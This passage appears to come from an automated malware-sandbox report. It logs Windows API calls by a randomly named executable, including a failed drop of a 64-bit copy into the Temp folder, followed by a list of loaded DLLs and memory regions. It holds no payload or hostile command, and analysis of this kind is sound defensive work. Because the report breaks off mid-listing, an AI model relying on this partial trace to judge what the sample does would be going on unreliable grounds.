lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x02\x2d\xa5\xa7\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0295.608] GetLastError () returned 0x0 [0295.608] SetLastError (dwErrCode=0x0) [0295.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0295.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0295.608] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0295.608] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0295.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x02\x2d\xa5\xa7\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0295.609] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0295.609] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0295.609] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0295.609] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0295.609] GetCurrentProcess () returned 0xffffffff [0295.609] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0295.609] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0295.609] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0295.609] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0295.609] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0295.615] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0295.615] LockResource (hResData=0x43c648) returned 0x43c648 [0295.615] GetCurrentPackageId () returned 0x3d54 [0295.615] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0295.615] GetLastError () returned 0x20 [0295.615] GetLastError () returned 0x20 [0295.615] SetLastError (dwErrCode=0x20) [0295.615] GetLastError () returned 0x20 [0295.615] SetLastError (dwErrCode=0x20) [0295.616] GetLastError () returned 0x20 [0295.616] SetLastError (dwErrCode=0x20) [0295.616] GetLastError () returned 0x20 [0295.616] SetLastError (dwErrCode=0x20) [0295.616] GetLastError () returned 0x20 [0295.616] SetLastError (dwErrCode=0x20) [0295.616] GetLastError () returned 0x20 [0295.616] SetLastError (dwErrCode=0x20) [0295.616] GetLastError () returned 0x20 [0295.616] SetLastError (dwErrCode=0x20) [0295.616] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e384 | out: lpMode=0x19e384) returned 1 [0296.011] WriteFile (in: hFile=0x3c, lpBuffer=0x19ea60*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e38c, lpOverlapped=0x0 | out: lpBuffer=0x19ea60*, lpNumberOfBytesWritten=0x19e38c*=0x49, lpOverlapped=0x0) returned 1 [0296.119] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0296.119] ExitProcess (uExitCode=0x1) Thread: id = 987 os_tid = 0xc2c Process: id = "136" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x68fcd000" os_pid = "0x93c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "131" os_parent_pid = "0x2b8" cmd_line = "vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9476 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9477 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9478 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9479 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9480 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 9481 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 9482 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 9483 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9484 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9485 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 9486 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9487 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9488 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9489 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9490 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9491 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9492 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9493 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9504 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9505 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9506 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9507 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9508 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9509 start_va = 0x480000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9510 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9511 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9512 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9513 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 9709 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9710 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 9711 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9712 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9713 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 9714 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 9715 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9716 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 9717 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9718 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9719 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9720 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9721 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 9722 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 9723 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 9724 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 9725 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 9726 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 9727 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 9728 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 9729 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 9730 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 9731 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 9792 start_va = 0x743b0000 end_va = 0x74441fff entry_point = 0x743b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 9793 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 9794 start_va = 0x750000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 9795 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 9796 start_va = 0x610000 end_va = 0x639fff 